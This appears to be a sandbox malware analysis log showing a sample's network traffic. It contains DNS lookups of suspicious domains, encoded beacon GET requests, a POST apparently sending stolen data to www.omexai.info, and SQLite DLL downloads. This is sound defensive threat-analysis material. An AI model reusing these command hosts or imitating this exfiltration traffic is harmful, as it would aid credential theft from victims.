Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: HOSTNETNL HOSTNETNL

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Thu, 05 Sep 2024 07:07:28 GMTserver: Apacheset-cookie: __tad=1725520048.2164810; expires=Sun, 03-Sep-2034 07:07:28 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 10 98 27 56 34 99 64 dc 04 93 d6 3d 14 25 67 cb d6 c8 76 a6 a7 38 bf 4c 1c fa 4d 4b e1 fc 01 c2 7e 2c ec 82 ce 60 27 39 3f 22 b2 ad f6 a1 d8 d7 6a 39 c0 54 8b f2 c9 52 fa ec 6e 7a 3c 7d 5b bb 42 99 81 10 74 1f 80 b1 aa 49 d1 b9 a1 e3 ff 7e 87 a1 ab 2f 07 8f f6 3c cb b0 b2 15 37 1a 02 76 ed ec c6 54 8b b3 cb d9 a5 9a 5f c1 01 18 3d 80 98 36 5e 8c 01 bd 5a 2b db 5a 57 c4 67 f5 b0 62 08 73 cb db d9 b0 78 6a f3 4a 6f 61 e0 16 49 a5 3d ab df 2f c0 58 83 cb a4 cc 25 34 0e eb e2 0d 53 1c e6 61 9e 94 9f 5b ad ee a0 41 87 c3 b8 1a 42 97 0b c9 97 88 ab 70 2d 63 47 4f 79 87 c4 c9 39 ed 05 fe d9 e8 6d 11 73 1d ee 7f 13 03 8f 11 31 b1 88 67 4b f8 75 fd bd 78 5b ed 0f e1 a6 9e d2 73 17 82 fd a1 1b e1 6f f1 08 0f 59 bd ae 34 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%C4iS]Z%sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Thu, 05 Sep 2024 07:07:30 GMTserver: Apacheset-cookie: __tad=1725520050.4286201; expires=Sun, 03-Sep-2034 07:07:30 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 10 98 27 56 34 99 64 dc 04 93 d6 3d 14 25 67 cb d6 c8 76 a6 a7 38 bf 4c 1c fa 4d 4b e1 fc 01 c2 7e 2c ec 82 ce 60 27 39 3f 22 b2 ad f6 a1 d8 d7 6a 39 c0 54 8b f2 c9 52 fa ec 6e 7a 3c 7d 5b bb 42 99 81 10 74 1f 80 b1 aa 49 d1 b9 a1 e3 ff 7e 87 a1 ab 2f 07 8f f6 3c cb b0 b2 15 37 1a 02 76 ed ec c6 54 8b b3 cb d9 a5 9a 5f c1 01 18 3d 80 98 36 5e 8c 01 bd 5a 2b db 5a 57 c4 67 f5 b0 62 08 73 cb db d9 b0 78 6a f3 4a 6f 61 e0 16 49 a5 3d ab df 2f c0 58 83 cb a4 cc 25 34 0e eb e2 0d 53 1c e6 61 9e 94 9f 5b ad ee a0 41 87 c3 b8 1a 42 97 0b c9 97 88 ab 70 2d 63 47 4f 79 87 c4 c9 39 ed 05 fe d9 e8 6d 11 73 1d ee 7f 13 03 8f 11 31 b1 88 67 4b f8 75 fd bd 78 5b ed 0f e1 a6 9e d2 73 17 82 fd a1 1b e1 6f f1 08 0f 59 bd ae 34 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%C4iS]Z%sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4

Source: C:\Windows\SysWOW64\netbtugc.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3360000[1].zip

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /2jit/?A8_pSPdX=iS4P4oRSl8BXKzGHILRVAF4LAAl1IYK6JXAZlPSQukWhX6ryYmutxv+d9ucM3CL7kJipDUdSquhSox7e6HgmYI08bz3IIKp3NcTDvEuGYqTKDQ0c7nXfRnBNa46x&38R0=jHY4nFvHAVc8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.elsupertodo.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /2022/sqlite-dll-win32-x86-3370000.zip HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /2022/sqlite-dll-win32-x86-3370000.zip HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /2021/sqlite-dll-win32-x86-3360000.zip HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /7xi5/?A8_pSPdX=ixI46zwDNWOoK0d6d9oZupQDSeTrSlA+qsFL+v4hzxqFGT4p3+8W5ZPgGBQ8bVBflzmq/wZaho2FRO9YF6xYKTPjOQanpFHctYNa2gQELNdW5L2bG4NjRgFmI2Bw&38R0=jHY4nFvHAVc8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.omexai.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /fpzw/?38R0=jHY4nFvHAVc8&A8_pSPdX=vk5QQsijTkj0pfF2YfQUWsKzZGFZZr+gcHfTrVh5yCT2NPNs5yeYQ+2oymVMaPQsdmNH36JHgT5sE/S60pHG7YfuD+9f6MY/b5+Sh71Gd/3RqNcTHTmfk9YtdJYY HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tekilla.wtfConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /3qit/?A8_pSPdX=t3sSYQcRGIG2xp6hTlX87NwaqJOkFz6rmgygjruUB9PzjWbyP4PTzskmOZowVRHJXi+H1dh53U0M9lWnnn5LaTEC7rIePtKzFAK2BftKdFSVrAHy6kwIpJ59Ijhf&38R0=jHY4nFvHAVc8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bola88site.oneConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /nxfn/?38R0=jHY4nFvHAVc8&A8_pSPdX=6j3CvtUhPdUgNSN69j0+QWfnbreQhpE9GdmFQzyR6PqyVz5YOV5rsMCr01dDJ3tx7/JxUqdZcV7VgtOZ6IqGV2qYbE9Zg8C0OLxYd5Fblj7aWglYFvr22nOv484K HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.languagemodel.proConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /3bdq/?A8_pSPdX=mPDvA1qI3GiuntP60f/rUorn47smR4p61+amzFfuWlPCagi05gb6jW0dSPIhEEY5GlOsioyOqKhT4H0OrZxilUUqq6EOplLI1qPNmT9wcl66RlEMoF/NT9bmJ4pJ&38R0=jHY4nFvHAVc8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kexweb.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /ikh0/?38R0=jHY4nFvHAVc8&A8_pSPdX=lvx8xqKuEeZXr5ITqJXMOhHudBjI1DEsZETVjxqXK0Zv2i3/Db6zHLOVaJTsGghSb2zUIGDfA5rd637aCh7mkrK3VrsyjhlNST0gb4jcYSXv3tE6yFdk4d8M6F9v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jobworklanka.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /h7lb/?A8_pSPdX=RbPHaORuq3VLsIvFE6xZ51H5/nq3Q2KtxUtCmsRXGI6jytYd3WVHUDgAs1Bl5qF7JnhTmlf74Hij29gRJq6necArhbC5i9d55ywI/6qv4tUNL5QxhF6ks96lGiUd&38R0=jHY4nFvHAVc8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dyme.techConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /e0nr/?A8_pSPdX=K/5K1kUHGJjjXPw2ZAxDiVQm7x6tzLgI6mASorW7taRlmnE0Vh93enW5Z4Ds2cuqFJog14u/lpBfGIp9XbYiBV5aXYL70oFCx0heCDyMErSN1DDZ3qmDN0IxT5Av&38R0=jHY4nFvHAVc8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mizuquan.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /pp43/?38R0=jHY4nFvHAVc8&A8_pSPdX=/yzCblrJsERuqgz3jNPVh3QXFKomWtIu+6Zh8/8YqB01FuO+DLXf0tlFHyR0DQ5uHVkhjJ85CmXcOpGqCMWGlbfbEQkZLHfLKViDcC/h13rX0D3njlQFWG5ZKSyE HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.nobartv6.websiteConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /lrst/?A8_pSPdX=mDrmkSN/AS2kB6lxw6968UvRuBo2CnIhmXXSSGppVfotDkdoE42/hFN7L43edTGNkqeamvN9p79evl2jiLPZXHCZACLKMeULs3Bzxtr9WkFRvQNQJByT+dkA1Yhl&38R0=jHY4nFvHAVc8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.sailnway.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic	HTTP traffic detected: GET /mquw/?A8_pSPdX=9VhEAk+nBcRFJItaXX6Ik3fcc5jQUDHEZy86ZzmkaEauDk+ByEDF1wffSRJdehvmJ40J6w+Nyel0VlcWIHUxviiTn/v8hhiufLl732sk/Kf2CDDROFQVvvK4n67B&38R0=jHY4nFvHAVc8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.chinaen.orgConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Source: global traffic	DNS traffic detected: DNS query: www.woshop.online
Source: global traffic	DNS traffic detected: DNS query: www.kxshopmr.store
Source: global traffic	DNS traffic detected: DNS query: www.elsupertodo.net
Source: global traffic	DNS traffic detected: DNS query: www.sqlite.org
Source: global traffic	DNS traffic detected: DNS query: www.omexai.info
Source: global traffic	DNS traffic detected: DNS query: www.tekilla.wtf
Source: global traffic	DNS traffic detected: DNS query: www.bola88site.one
Source: global traffic	DNS traffic detected: DNS query: www.languagemodel.pro
Source: global traffic	DNS traffic detected: DNS query: www.kexweb.top
Source: global traffic	DNS traffic detected: DNS query: www.jobworklanka.online
Source: global traffic	DNS traffic detected: DNS query: www.dyme.tech
Source: global traffic	DNS traffic detected: DNS query: www.arlon-commerce.com
Source: global traffic	DNS traffic detected: DNS query: www.mizuquan.top
Source: global traffic	DNS traffic detected: DNS query: www.nobartv6.website
Source: global traffic	DNS traffic detected: DNS query: www.sailnway.net
Source: global traffic	DNS traffic detected: DNS query: www.chinaen.org

Source: unknown

HTTP traffic detected: POST /7xi5/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.omexai.infoOrigin: http://www.omexai.infoContent-Type: application/x-www-form-urlencodedContent-Length: 2165Connection: closeCache-Control: max-age=0Referer: http://www.omexai.info/7xi5/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)Data Raw: 41 38 5f 70 53 50 64 58 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 67 51 66 56 72 59 48 6f 4a 73 47 66 76 58 6d 66 56 49 69 6c 35 4e 49 74 2f 59 45 37 53 54 74 48 67 4a 37 37 66 63 70 6c 61 79 36 4a 33 78 46 55 77 4a 63 73 42 44 66 78 43 74 2b 6d 2b 2f 2f 54 59 42 79 4b 4b 38 61 45 6a 76 4e 58 54 48 79 6a 31 71 35 74 62 31 4a 38 54 59 4e 65 65 46 37 2b 4c 4b 6b 65 70 77 74 64 67 52 71 4f 6d 73 56 69 72 6c 51 47 55 4a 6b 6c 66 7a 4f 48 6e 50 79 37 69 4d 35 55 38 69 47 47 61 6e 69 6a 4e 34 46 71 78 30 78 2b 55 2b 6a 55 4d 6a 38 52 6f 66 42 50 58 49 30 6e 6e 46 78 72 7a 75 54 58 62 6b 30 42 55 71 63 35 77 7a 35 7a 4e 31 4d 2f 52 65 72 6e 68 64 42 61 46 4e 79 48 6f 6d 75 43 76 70 2b 38 55 44 36 6c 54 54 49 7a 43 55 54 43 38 4b 69 6e 5a 66 33 66 35 44 79 77 39 45 34 46 73 62 4a 4b 4c 2f 62 72 46 76 48 61 78 54 63 75 6d 57 39 44 55 76 65 69 2b 34 35 48 66 53 30 39 2b 68 35 43 52 32 4c 6f 50 4a 38 67 31 2f 2f 45 43 32 37 4b 45 4c 79 70 43 59 4c 2b 57 51 71 61 33 79 67 62 6f 67 4c 2b 65 7a 63 70 75 5a 55 78 32 57 39 41 5a 59 6c 48 72 75 2b 69 4b 63 46 68 34 57 57 51 34 41 6c 71 6b 51 32 56 2b 48 2f 58 50 62 6b 36 37 59 37 38 4d 35 41 46 75 66 43 46 35 45 7a 4a 79 47 48 61 62 32 33 34 44 4b 32 74 7a 75 64 42 53 70 59 41 6b 50 63 57 5a 54 7a 57 61 39 37 6a 54 76 6e 6d 74 45 6e 74 70 63 30 41 6e 42 6c 75 7a 55 4a 6c 6b 37 58 79 42 4c 67 69 42 7a 56 6e 4e 68 4b 32 33 75 6f 73 33 46 34 63 47 62 67 5a 42 36 35 31 70 63 32 6b 37 33 59 49 79 6a 37 56 41 30 6f 65 73 64 64 75 47 5a 54 55 51 78 58 79 6b 61 74 34 79 7a 2f 76 66 39 32 59 5a 78 6b 35 63 4b 59 65 32 49 6b 6c 30 65 79 37 72 4b 62 55 4f 63 64 54 43 71 39 6f 67 55 2b 54 6e 4b 4c 62 76 68 48 67 6c 4b 46 4f 61 78 34 77 4c 63 4b 65 7a 70 54 38 44 4b 61 59 68 31 6d 6e 58 6f 70 45 75 33 4b 41 69 4b 52 77 52 68 67 2f 52 2f 33 71 6a 66 45 4a 49 69 30 68 54 6e 6d 46 68 35 6f 77 53 38 79 2b 4a 75 49 6f 59 72 49 62 72 44 65 72 67 76 4d 45 31 6f 55 58 47 44 30 56 77 44 33 70 53 75 36 30 34 4e 43 7a 4f 48 50 4f 65 4c 32 5a 6c 34 6b 55 6d 6c 7a 36 41 32 63 77 4d 7a 77 51 48 68 71 35 6e 6f 70 48 59 4b 33 67 66 65 39 79 48 58 57 57 56 31 61 38 45 33 6e 5a 57 4a 6d 4d 6e 63 33 6b 6f 7a 54 6b 55 68 35 74 70 6d 7a 78 4e 73 4f 48 36 35 68 43 49 4e 78 6b 75 4b 45 77 49 4f 47 78 39 53 39 65 2f 30 6e 67 66 61 47 59 68 69 59 4d 2f 34 70 70 47 61 70 7a 46 76 37 77 2b 41 5a 39 72 5a 69 64 73 56 6e 36 79 6c 76 72 30 6b 74 37 39 47

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeDate: Thu, 05 Sep 2024 07:05:33 GMTContent-type: text/html; charset=utf-8Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 20 6c 69 6e 65 6e 6f 3d 22 33 38 30 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 6f 63 75 6d 65 6e 74 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 2f 32 30 32 32 2f 73 71 6c 69 74 65 2d 64 6c 6c 2d 77 69 6e 33 32 2d 78 38 36 2d 33 33 37 30 30 30 30 2e 7a 69 70 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title lineno="380">Not Found</title></head><body><h1>Document Not Found</h1>The document /2022/sqlite-dll-win32-x86-3370000.zip is not available on this server</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeDate: Thu, 05 Sep 2024 07:05:35 GMTContent-type: text/html; charset=utf-8Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 20 6c 69 6e 65 6e 6f 3d 22 33 38 30 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 6f 63 75 6d 65 6e 74 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 2f 32 30 32 32 2f 73 71 6c 69 74 65 2d 64 6c 6c 2d 77 69 6e 33 32 2d 78 38 36 2d 33 33 37 30 30 30 30 2e 7a 69 70 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title lineno="380">Not Found</title></head><body><h1>Document Not Found</h1>The document /2022/sqlite-dll-win32-x86-3370000.zip is not available on this server</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 05 Sep 2024 07:05:54 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 05 Sep 2024 07:05:59 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 05 Sep 2024 07:06:05 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 